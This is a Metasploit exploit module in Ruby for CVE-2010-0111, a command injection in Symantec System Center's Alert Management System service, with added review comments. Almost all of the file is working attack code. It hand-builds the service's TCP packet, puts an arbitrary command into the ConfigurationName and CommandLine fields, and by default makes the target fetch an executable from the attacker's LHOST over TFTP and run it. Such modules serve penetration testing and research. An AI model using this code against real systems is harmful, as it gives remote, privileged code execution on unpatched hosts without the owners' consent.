Path: blob/master/modules/exploits/windows/antivirus/ams_hndlrsvc.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Symantec System Center Alert Management System (hndlrsvc.exe) command
# injection, CVE-2010-0111 (OSVDB 66807, BID 41959).
#
# The module talks to the AMS handler service over plain TCP (RPORT defaults
# to 38292) and sends a single hand-built request whose 'ConfigurationName'
# and 'CommandLine' fields carry the operator-supplied command; see
# #execute_command for the byte layout. #exploit either sends a custom CMD
# verbatim or, via #windows_stager, makes the host fetch and run a payload
# executable over TFTP.
#
# connect / sock / disconnect come from Msf::Exploit::Remote::Tcp and
# generate_payload_exe from Msf::Exploit::EXE.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::EXE

  # Module metadata and options.
  #
  # Options registered below:
  #   RPORT - defaults to 38292.
  #   CMD   - optional; when non-blank, #exploit sends it as-is instead of
  #           using the TFTP stager.
  #   LHOST - declared optional here, but #exploit refuses to run the stager
  #           without it, because the stager tells the target to download the
  #           payload from this address.
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Symantec System Center Alert Management System (hndlrsvc.exe) Arbitrary Command Execution',
      'Description'    => %q{
        Symantec System Center Alert Management System is prone to a
        remote command-injection vulnerability because the application fails
        to properly sanitize user-supplied input. This is part of Symantec
        AntiVirus Corporate Edition 8.0 - 10.1.7.
      },
      'Author'         => [ 'MC' ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['OSVDB', '66807'],
          ['BID', '41959'],
          ['CVE', '2010-0111'],
          ['URL', 'http://www.foofus.net/~spider/code/AMS2_072610.txt'],
        ],
      'Targets'        =>
        [
          [ 'Windows Universal',
            {
              'Arch' => ARCH_X86,
              'Platform' => 'win'
            }
          ]
        ],
      'Privileged'     => true,
      'Platform'       => 'win',
      'DefaultTarget'  => 0,
      'DisclosureDate' => '2010-07-26'))

    register_options([
      Opt::RPORT(38292),
      OptString.new('CMD', [ false, 'Execute this command instead of using command stager', ""]),
      OptAddress.new('LHOST', [ false, 'The listen IP address from where the victim downloads the payload' ])
    ])
  end

  # Payload delivery for the Windows target.
  #
  # Generates the payload executable, serves it from a TFTP server started in
  # this process under a random 11-letter upper-case name, then issues two
  # commands through #execute_command: the first makes the target fetch the
  # file over TFTP from the LHOST address, the second runs the downloaded file.
  #
  # Observable side effect on the target side: an outbound TFTP transfer from
  # the AMS host to LHOST, followed by execution of a freshly written .exe.
  #
  # NOTE(review): @tftp is started here and nothing in this file stops it
  # (there is no cleanup override), so the server keeps running after the
  # module finishes unless the framework tears it down.
  def windows_stager
    @pl = generate_payload_exe
    @tftp = Rex::Proto::TFTP::Server.new
    payload_name = "#{Rex::Text.rand_text_alpha_upper(11)}.exe"
    @tftp.register_file(payload_name,@pl,true)
    @tftp.start
    print_status("Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}")
    # The datastore is case-insensitive, so 'lhost' resolves to the LHOST
    # option registered in #initialize.
    execute_command("tftp -i #{datastore['lhost']} GET #{payload_name}")
    print_status("Attempting to execute the payload...")
    execute_command(payload_name)
  end

  # Builds one AMS request carrying `cmd`, sends it over the TCP socket and
  # disconnects.
  #
  # @param cmd  [String] command line placed in the 'ConfigurationName' and
  #   'CommandLine' fields; refused when longer than 128 characters.
  # @param opts [Hash] accepted but not read anywhere in this method.
  # @raise via fail_with when cmd exceeds 128 characters. connect has already
  #   been called at that point, so the open TCP session is left to the
  #   framework rather than closed here.
  #
  # Wire-format notes, derived only from the literals below (no protocol
  # specification is referenced by this file):
  #   - a fixed header, then the 8-byte marker 'PRGXCNFG';
  #   - a run of name/value records. Each record name is preceded by a few
  #     tag bytes whose little-endian 16-bit value equals the name length + 1
  #     (e.g. "\x0a\x00" = 10 before the 9-byte 'File Path'), and each
  #     variable-length value is preceded by [len + 3].pack('n') and
  #     [len + 1].pack('n'), then "\x00". Because every value stays below 256
  #     bytes (string_dos is 5..8 chars, cmd is capped at 128) the high byte
  #     of each pack('n') is "\x00" and doubles as the terminator of the
  #     preceding string; read that way the layout looks like NUL-terminated
  #     strings followed by little-endian u16 lengths, matching the pack('v')
  #     used for the two string_uno fields. Inferred — confirm against a
  #     capture before relying on it;
  #   - the content is followed by an equal number of NUL bytes
  #     ("\x00" * packet.length), so the message on the wire is exactly twice
  #     the length of the content assembled above.
  # The fixed strings ('PRGXCNFG', 'Risk Repaired', 'Symantec Antivirus
  # Corporate Edition', 'Risk Name', 'File Path', 'CommandLine', 'RunArgs',
  # 'HandlerHost', ...) are identical on every run; only string_uno,
  # string_dos and cmd vary, which is what makes this traffic recognisable.
  #
  # NOTE(review): cmd.length counts characters, not bytes; a non-ASCII
  # command would make both length prefixes under-count.
  def execute_command(cmd, opts = {})
    connect
    if ( cmd.length > 128 )
      fail_with(Failure::Unknown, "Command strings greater then 128 characters will not be processed!")
    end

    # Random filler: string_uno is always 11 upper-case letters, string_dos
    # is 5..8 upper-case letters.
    string_uno = Rex::Text.rand_text_alpha_upper(11)
    string_dos = Rex::Text.rand_text_alpha_upper(rand(4) + 5)

    # Fixed header. "\x95\x94" is 38292 (the default RPORT) read big-endian
    # and "\xc0\xa8\x02\x64" is 192.168.2.100, preceded by "\x02\x00" — the
    # shape of a sockaddr_in, but these bytes are constants and are not
    # derived from RHOST/RPORT. Whether the service reads them cannot be
    # determined from this file.
    packet = "\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00"
    packet << "\x02\x00\x95\x94\xc0\xa8\x02\x64\x00\x00\x00\x00\x00\x00\x00\x00"
    packet << "\xe8\x03\x00\x00"
    packet << 'PRGXCNFG'
    packet << "\x10\x00\x00\x00"
    packet << "\x00\x00\x00\x00\x04"
    packet << 'ALHD\F'
    packet << "\x00\x00\x01\x00\x00"
    packet << "\x00\x01\x00\x0e\x00"
    packet << 'Risk Repaired'
    packet << "\x00\x25\x00"
    packet << 'Symantec Antivirus Corporate Edition'
    packet << "\x00\xf9\x1d\x13\x4a\x3f"
    # string_uno fields use a single little-endian u16 length (len + 1).
    packet << [string_uno.length + 1].pack('v') + string_uno
    packet << "\x00\x08\x08\x0a"
    packet << "\x00" + 'Risk Name'
    packet << [string_dos.length + 3].pack('n') + [string_dos.length + 1].pack('n')
    packet << "\x00" + string_dos
    packet << "\x00\x08\x0a\x00"
    packet << 'File Path'
    packet << [string_dos.length + 3].pack('n') + [string_dos.length + 1].pack('n')
    packet << "\x00" + string_dos
    packet << "\x00\x08\x11\x00"
    packet << 'Requested Action'
    packet << [string_dos.length + 3].pack('n') + [string_dos.length + 1].pack('n')
    packet << "\x00" + string_dos
    packet << "\x00\x08\x0e\x00"
    packet << 'Actual Action'
    packet << [string_dos.length + 3].pack('n') + [string_dos.length + 1].pack('n')
    packet << "\x00" + string_dos
    packet << "\x00\x08\x07\x00"
    packet << 'Logger'
    packet << [string_dos.length + 3].pack('n') + [string_dos.length + 1].pack('n')
    packet << "\x00" + string_dos
    packet << "\x00\x08\x05\x00"
    packet << 'User'
    packet << [string_dos.length + 3].pack('n') + [string_dos.length + 1].pack('n')
    packet << "\x00" + string_dos
    packet << "\x00\x08\x09\x00"
    packet << 'Hostname'
    packet << "\x00\x0e\x00" + [string_uno.length + 1].pack('v') + string_uno
    packet << "\x00\x08\x13\x00"
    packet << 'Corrective Actions'
    packet << [string_dos.length + 3].pack('n') + [string_dos.length + 1].pack('n')
    packet << "\x00" + string_dos
    # The injected command appears twice: once as 'ConfigurationName' and
    # once as 'CommandLine'.
    packet << "\x00\x00\x07\x08\x12\x00"
    packet << 'ConfigurationName'
    packet << [cmd.length + 3].pack('n') + [cmd.length + 1].pack('n')
    packet << "\x00" + cmd
    packet << "\x00\x08\x0c\x00"
    packet << 'CommandLine'
    packet << [cmd.length + 3].pack('n') + [cmd.length + 1].pack('n')
    packet << "\x00" + cmd
    packet << "\x00\x08\x08\x00"
    packet << 'RunArgs'
    packet << "\x00\x04\x00\x02\x00"
    packet << "\x20\x00\x03\x05\x00"
    packet << 'Mode'
    packet << "\x00\x04\x00\x02\x00\x00\x00"
    packet << "\x0a\x0d\x00"
    packet << 'FormatString'
    packet << "\x00\x02\x00\x00\x00\x08\x12\x00"
    packet << 'ConfigurationName'
    packet << "\x00\x02\x00\x00\x00\x08\x0c\x00"
    packet << 'HandlerHost'
    packet << [string_dos.length + 3].pack('n') + [string_dos.length + 1].pack('n')
    packet << "\x00" + string_dos
    # Zero padding equal to everything assembled so far.
    packet << "\x00" * packet.length

    sock.put(packet)

    # Kernel#select with no descriptors: a plain 3-second pause before the
    # socket is closed. No response is read.
    select(nil,nil,nil,3)
    disconnect
  end

  # Entry point.
  #
  # When CMD is set it is sent once via #execute_command and the method
  # returns without calling handler. Otherwise the 'win' target runs
  # #windows_stager (LHOST is mandatory on this path) and handler is started
  # for the payload session; any other platform value is rejected.
  def exploit
    unless datastore['CMD'].blank?
      print_status("Executing command '#{datastore['CMD']}'")
      execute_command(datastore['CMD'])
      return
    end

    case target['Platform']
    when 'win'
      if datastore['LHOST'].blank?
        fail_with(Failure::Unknown, 'If no custom CMD is set, LHOST is required.')
      end
      windows_stager
    else
      fail_with(Failure::Unknown, 'Target not supported.')
    end

    handler
  end
end